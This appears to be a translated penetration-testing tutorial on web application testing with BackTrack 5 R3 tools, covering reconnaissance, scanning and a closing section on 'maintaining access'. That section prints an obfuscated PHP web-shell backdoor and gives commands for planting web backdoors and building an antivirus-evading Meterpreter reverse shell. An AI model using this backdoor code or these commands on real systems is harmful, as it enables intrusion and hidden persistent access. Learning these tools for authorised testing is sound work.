Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Computer security
1. Computer Security
Written by
Caleb Bucker
Pen-Tester – Ethical Hacker – Security Researcher
http://calebbucker.blogspot.com/
http://www.twitter.com/CalebDrugs
https://www.facebook.com/caleb.bucker
mailto:calebbucker@gmail.com
The Original Copy in Spanish Language
http://www.sendspace.com/file/gyljvj
PENETRATION TESTING
Web Analysis ‐ Vulnerability Assessment – Exploitation
Translated By
Mohamed Abdel Azim Mohamed
2. Index
• INTRODUCTION
• METHODS OF ANALYSIS OF WEB APPLICATIONS
1. NETWORK MAPPING
• Nmap
• Netifera
2. INFORMATION GATHERING
• TheHarvester
• Maltego
3. CMS IDENTIFICATION
• BlindElephant
• CMS-Explorer
• WhatWeb
4. IDS/IPS DETECTION
• Waffit
5. OPEN SOURCE ANALYSIS
• GHDB (Google Hacking DataBase)
• Xssed
6. WEB CRAWLERS
• WebShag
• DirBuster
7. VULNERABILITY ASSESSMENT AND EXPLOITATION
• JoomScan
• SqlMap
• Fimap
• Shodan
• W3af
• Uniscan
• Nikto
8. MAINTAINING ACCESS
• Weevely
• WeBaCoo
• MsfPayload
9. CONCLUSIÓN
3. INTRODUCTION
Today, as many of us (Pen-tester's) we know that in these times the Analysis of Web Applications play a very
important role in making a Safety Evaluation and / or Penetration Testing, as this gives us the appropriate
information about web Application, such as the type of plugin you use, either types of Joomla CMS -
WordPress or other.
This will help us to determine what we should use Exploit, or see exactly how to exploit the vulnerabilities
that can occur when performing penetration testing.
Penetration Testing tests are also used to determine the level of security: a computer, a computer network
LAN (Local Area Network) or WLAN (Wireless Local Area Network), among other Web applications, using
identical simulated computer attacks those who conduct a Black Hat Hacker, or Cracker but without
compromising the information or the availability of services, this is done in order to identify the potential
threats in iT systems before the attacker discovers a (external or internal ). This process is also known as
Ethical Hacking (Ethical Hacking).
To perform this procedure Penetration Testing, BackTrack 5 R3 is used, a Linux distro based on Ubuntu
perfectly made to carry out these tests, as it comes with a set of very important tools that do much to get all
the necessary information about web applications, among others.
BackTrack Wiki:
http://www.backtrack-linux.org/wiki/
Descarga:
http://www.backtrack-linux.org/downloads/
4. METHODS OF ANALYSIS OF WEB APPLICATIONS:
1. NETWORK MAPPING:
Network Mapping is the study of the physical network connectivity. Mapping Internet is the study of
the physical connectivity of the Internet. Network Mapping is often determine the servers and
operating systems running on the network. The law and ethics of port scans are complex. An analysis
of the network can be detected by humans or automated systems, and is treated as a malicious act.
In the BackTrack suite includes NMAP, a tool that we all know for its power and effectiveness in
performing their work, which is very useful to us to carry out this method so important in a Web
Audit.
• NMAP:
Nmap ("Network Mapper") is an open source tool for network exploration and security
auditing. Nmap uses IP packets "raw" ("raw", NT) in original ways to determine what hosts are
available on a network, what services (name and version of the application) offering, what
operating systems (and their versions) running, what type of packet filters or firewalls are in
use, and dozens of other characteristics.
Use:
nmap www.sitio-web.com
nmap 192.168.1.1
5. • NETIFERA:
Netifera is a network scanner can scan passive (analyzing a pcap file, network sniffing lives)
and assets of analysis (analysis of port entity). Identifies the network hosts.
This project offers many advantages for security developers and researchers who want to
implement new tools as well as the community of users of these tools.
This tool is included in BackTrack and is located at the following address:
Applications - BackTrack - Information Gathering - Network Analysis - Identify Live Hosts –
Netifera
The usage is very easy, just have to put the web address where it says: ... Type Address enter pressed
and we will come out with the target website's and IP's to which will audit.:
In this case I placed the website: www.paypal.com in which I made Reverse lookup, TCP Connect
Scan UDP Scan, Crawler, NS Lookup, Brute Force Host Name
6. 2. INFORMATION GATHERING
The first phase of safety assessment focuses on gathering information as much as possible about a web
application. Gathering information is the most critical step of a test web application security. This task
can be accomplished in many different ways, using public tools (search engine) scanner, simple sending
HTTP requests or requests specially designed, it is possible to apply force to the filter information, for
example, the disclosure error message or versions and technologies used.
There are basically two types of data collection: active and passive. Passive information gathering is that
attackers will not communicate directly with the target and are trying to gather information that is
available on the Internet, while in the active collection of information, the attacker will be in direct
contact with the object and will be trying to gather information.
• THEHARVESTER:
The Harvester is a tool to collect email accounts, user names and host names or sub domains from
different public sources such as search engines and PGP key servers.
Use:
/pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 500 -b google
/pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -b pgp
/pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 200 -b linkedin
• MALTEGO:
Maltego is a tool that is based on the application information and forensic and shows how information
is connected to each other. With Maltego, we can find relationships that people mostly use today,
including your social profile (Facebook - Twitter), mutual friends, businesses that relate to the
information gathered, and websites. If we collect information regarding any infrastructure, we can
gather relationship between domains and DNS names.
Location:
Applications - Backtrack - Information Gathering - Network Analysis - DNS Analysis – Maltego
8. 3. CMS IDENTIFICATION
• BLINDELEPHANT:
BlindElephant is a python based tool that is used for Web Application Fingerprinting. The tool is
quick, has low bandwidth and is highly automated.
Use
/pentest/web/blindelephant/src/blindelephant# ./BlindElephant.py http://sitio-web.com/ cms
• CMS-EXPLORER:
Fingerprinting serves for web applications, can also be used to identify the type of CMS used,
therefore, the attack is done according to the obtained information.
Use:
/pentest/enumeration/web/cms-explorer# ./cms-explorer.pl -url http://sitio-web.com/ -type cms
9. • WHATWEB:
It is another tool used to identify the type of content management systems (CMS), blogging
platform, statistics, and servers used Javascript libraries.Has 900 Plugins for web analytics purposes.
Use:
/pentest/enumeration/web/whatweb# ./whatweb http://sitio-web.com/
/pentest/enumeration/web/whatweb# ./whatweb -v http://sitio-web.com/
/pentest/enumeration/web/whatweb# ./whatweb -a 3 http://sitio-web.com/
/pentest/enumeration/web/whatweb# ./whatweb 192.168.1.1/24
4. IDS/IPS DETECTION
During the realization of a VA / PT in a domain, the possibility exists that the IDS-IPS services are
installed, this can sometimes stop several types of attacks that are made in the domain.
A lot of WAF (Web Application Firewall) are sold to companies as a successful technique for
mitigating vulnerabilities in Web applications.
Luckily, WAF is easy to detect, because most of these use signature-based detection methods,
therefore, the attacker can try to encode parameters and try bypassear attack the WAF.
In the BackTrack suite includes a useful tool for the detection of IDS-IPS, which is Waffit.
• WAFFIT:
It is a tool that detects possible Firewall you may have a web server, it is of little use, since
detecting the firewall behind the domain is a very important step in the process of penetration
testing.
Use:
/pentest/web/waffit# ./wafw00f.py http://sitio-web.com/
10.
11. 5. OPEN SOURCE ANALYSIS
Open-Source Analysis is performed using tools like GHDB, revhosts and XSSed. The GHDB
(Google Hack Data Base) and XSSed are linked to websites, while rev hosts is a console tool.
• GHDB:
Google Hacking Database, the exploit-db team maintains a database for Google Dork's that can
greatly help in Pen-tester's information gathering. We can use the dork's to find certain types of
vulnerable servers or other information.
For example, a Google dork like "Microsoft-IIS/6.0" intitle: index.of "can be used to detect
servers running on Microsoft IIS 6.0.
• XSSED:
http://www.xssed.com/ a website that contains a list of websites vulnerable to Cross Site Scripting
(XSS), by various authors.
It can be opened from: Applications - Backtrack - Information Gathering - Web Application
Analysis - Open Source Analysis - Xssed.
6. WEB CRAWLERS
In this last category of Web Analysis, famous Crawlers are used, this will help much to list the files
and folders "hidden" inside a web server.
The BackTrack suite has many tools to perform this type of analysis such as the DIRB, Golismero,
SQLScan, Deblaze and WebShag.
• WEBSHAG:
Webshag is a tool programmed in Python, which combines the features useful for Auditing Web
Servers as web crawling, URL scanning or file fuzzing.
Webshag can be used to analyze a web server in HTTP or HTTPS, through a proxy and using HTTP
authentication (Basic and Digest).
12. Besides innovative features proposed IDS evasion, intended that the correlation between the
application more complicated (for example, using a random sample for each proxy server HTTP
request).
It can be opened from Applications - BackTrack - Information Gathering - Web Application
Analysis - Web Crawlers - WebShag Gui.
• DIRBUSTER:
DirBuster is a Java application designed to make Brute Force in the directories and files in web server
/ application. Often is the case now of what looks like a web server in a state of default installation is
actually not, and has pages and applications hidden within it, then try to find these DirBuster.
DirBuster is a total of 9 different lists, this makes DirBuster extremely effective in finding hidden
files and directories. And if that was not enough DirBuster also has the option of making a pure Brute
Force.
It can be found at the following location: Applications - BackTrack - Vulnerabylity Assessment -
Web Application Assessment - Web Application Fuzzers – DirBuster
13.
14. 7. VULNERABILITY ASSESSMENT AND EXPLOITATION
The stage of vulnerability assessment is where you can explore our goal for errors, but before a
vulnerability assessment, gathering information about the target is much more useful.
The information gathering phase remains the key step before further attacks, simply because it makes the
job easier, for example, in the first stage in the use of scanners to identify the CMS as BlindElephant, was
scanned and found the version of the installed application.
Now, at the stage of vulnerability assessment, you can use many tools (scanners) that will help a lot to
find vulnerabilities in respective specific web server.
• JOOMSCAN:
It is a Perl-based tool that is used to identify known vulnerabilities such as SQL Injection, XSS or
other, on web servers based on the Joomla platform.
• Detects the version of Joomla! is running.
• Scan and locate known vulnerabilities in Joomla! and its extensions.
• It reports in text or HTML format.
• Allow immediate updating via a scanner or svn.
• type Detects vulnerabilities: SQL injection, LFI, RFI, XSS and others.
It can be opened from
/pentest/web/joomscan# ./joomscan.pl -u www.sitio-web.com
• SQLMAP:
It is a tool that helps automate the process of detecting and exploiting SQL injection vulnerabilities
allowing full access to the database of Web servers.
It can be opened from
/pentest/database/sqlmap# ./sqlmap.py -u http://www.sitio-web.com/ --dbs
15. • FIMAP:
It is a small tool programmed in python which can find, prepare, audit and automatically exploiting
Remote File Inclusion errors in web applications. Is currently under development, but it is usable. The
objective is to improve the quality Fimap and security of your website.
It can be opened from
/pentest/web/fimap# ./fimap.py -u http://localhost/test.php?file=bang&id=23
/pentest/web/fimap# ./fimap.py -g -q 'noticias.php?id='
16. • SHODAN:
This is another site evaluation tool, particular utility for pentesters. It can be used to collect a series of
intelligent information about devices that are connected to the Internet.
We can, for example, look to see if all network devices such as routers, VoIP, printers, cameras, etc.,
are in place. To find if a service is running in the domain, the syntax would be:
• hostname: port target.com: 80,21,22
If we simply want to know the results on the host name, simply, the syntax would be:
• hostname: target.com
• W3AF:
Audit is a tool for web applications security, is basically divided into several modules such as Attack,
Audit, Exploit, Discovery, and Brute Force Evasion, which can all be used accordingly. These
modules come with several modules w3af side, for example, we can select the module XSS Audit
assuming it is necessary to perform a particular audit.
It can be opened from
Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web
Vulnerability Scanners - w3af
17. Once the analysis is complete, w3af shows detailed information about the vulnerabilities found in the
specified website, which can compromise accordingly for further exploitation.
18. • UNISCAN:
A Web Vulnerability Scanner, led to computer security, aimed at finding vulnerabilities in web
systems. It is licensed under GNU GENERAL PUBLIC LICENSE 3.0 (GPL 3).
Uniscan is developed in Perl, has easy handling of regular expressions and is also multi-threaded.
Features:
• identification system pages via a web crawler.
• Proof of pages found through the GET method.
• Test the forms found by the POST method.
• Support for SSL requests (HTTPS).
• Supports Proxy.
• Generate list of sites via Google.
• Generate list of sites with Bing.
• Client GUI written using perl tk.
It can be downloaded from the following link:
http://uniscan.sourceforge.net/?page_id=7
it can be opened from ./uniscan.pl -u http://www.sitio-web.com/ -qweds
• NIKTO:
It is a web server scanner which performs comprehensive tests against web servers for multiple items,
including over 6500 files / CGIs potentially dangerous controls outdated versions of over 1250
19. servers, and version specific problems on over 270 servers. It also checks the server configuration
elements, such as the presence of multiple index files and HTTP server options.
Nikto is a robust project that has been several years in development and is constantly evolving. Some
of the most interesting features of this tool include the ability to generate reports in various formats,
integration with LibWhisker (Anti-IDS), integration with Metasploit, among others.
it can be opened from
Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web
Vulnerability Scanners - Nikto
Use:
/pentest/web/nikto# ./nikto.pl -host www.sitio-web.com
8. MAITAINING ACCESS
Once you access the website (goal), we need to maintain access for future use, because we will not be
starting from scratch again and again. To avoid this, we can load the shell backdoors's web or the web
page. The coding of the tailgate is also important, as not to create "noise" when loaded on the server. If
so, then administrators can easily detect and remove the rear doors.
In BackTrack 5 R3 suite incorporates good tools to carry out this process, which are:
• WEEVELY:
It is an essential tool for the further exploitation of web applications, and can be used as a back door
or a web shell to manage web accounts. Weevely search functions like system (), passthru (), popen
(), exec (), proc_open (), shell_exec (), pcntl_exec (), perl-> system (), python_eval ()) using activated
functions in a server remote. The following code is an example of the code of the backdoor created by
Weevely.
-------------------------------------------------------------------------------------------------------------------
20. eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk
YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv
c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK
GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30='));
-------------------------------------------------------------------------------------------------------------------
It can be opened from Applications - BackTrack - Maintaining Access - Web BackDoors -
Weevely
Use:
/pentest/backdoors/web/weevely# ./weevely.py generate password /root/back.php
/pentest/backdoors/web/weevely# ./weevely.py http://www.sitio-web.com/back.php password
• WEBACOO:
WeBaCoo (Web Backdoor Cookie) is a backdoor that provides a terminal connection over HTTP
between client and web server. It is an exploitation tool to maintain access to a web server (hacked).
It was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls
and Application Firewalls, proving stealth mechanism to execute commands on the compromised
server. File obfuscated performs communication via HTTP header's Cookie validating HTTP requests
and responses from the web server. WeBaCoo provides a way to generate the code to create the PHP
backdoor using predefined payloads. It also offers the "terminal" mode in which the user can establish
a remote connection to the server and execute commands with privileges of the web service desired.
The download is available from Github:
https://github.com/anestisb/WeBaCoo
Options:
1) Create obfuscated backdoor 'backdoor.php' with default settings:
•. / Webacoo.pl-g-o backdoor.php
2) Create 'raw-backdoor.php' backdoor de-obfuscated using the work "transit":
•. / webacoo.pl-g-o raw-backdoor.php-f 4-r
3) Set "terminal" connection to the remote host using the default settings:
•. / webacoo.pl-t-u http://127.0. 0.1/backdoor.php
4) Set "terminal" connection to the remote host to configure some arguments:
•. / webacoo.pl-t-u-c http://127.0.0.1/backdoor.php "Test-Cookie" - d "TTT"
21. 5) Set "terminal" connection to the remote host via HTTP proxy:
•. / webacoo.pl-t-u-p 127.0.0.1:8080 http://10.0.1.13/backdoor.php
6 ) Set "terminal" connection to the remote host via HTTP proxy with basic authentication:
•. / webacoo.pl-t-u-p http://10.0.1.13/backdoor.php user: password: 10.0.1.8: 3128
7) Set "terminal" connection to the remote host via Tor and record activity:
•. / webacoo.pl-t-u-p http://example.com/backdoor.php tor-l webacoo_log.txt
• MSFPAYLOAD:
Metasploit can be used to create backdoors that can then be used to maintain access to the web server.
This can be done with the help of msfpayload. The steps to create backdoor msfpayload are as
follows: We have to select the Payload that we will use to get a Meterpreter shell generated through a
reverse TCP connection. The command would be:
msfpayload windows/meterpreter/reverse_tcp
This Payload has two parameters: lhost (our IP) and LPORT to select the port that we will use. The
"R" is used for the output file in RAW data format so that we can then encode.
msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R
This command will create the payload, but it has to be coded to avoid antivirus detection for that
matter can be done using the msfencode option to do this, we need to use pipe ("|")
windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e
x86/shikata_ga_nai –t exe >> bucker.exe
-e is used to specify the encoding necessary in this case I'm using the encoding shikata_ga_nai and-t
for the type of file extension (exe). For example, if we want to see the list of available encoders MSF,
use the following command:
msfpayload windows/meterpreter/reverse_tcp -l
22. 9. CONCLUSION
These are only a few methods you can follow to make the exploitation of vulnerabilities in a web
application.
Once we have the information about our goal, try to perform a vulnerability assessment in order to obtain
information about the exploits that can be used.
Once done, exploit vulnerabilities and, if necessary, load a backdoor, but before that, you must encode the
backdoor to avoid detection.
I hope this will help you find the vulnerability, exploitation and how to maintain access to your target.
My Greeting.
References:
http://en.wikipedia.org/wiki/Penetration_test
http://www.giac.org/certification/web-application-penetration-tester-gwapt
http://www.offensive-security.com/information-security-training/penetration-testing-with-backtrack/
https://www.owasp.org/index.php/Web_Application_Penetration_Testing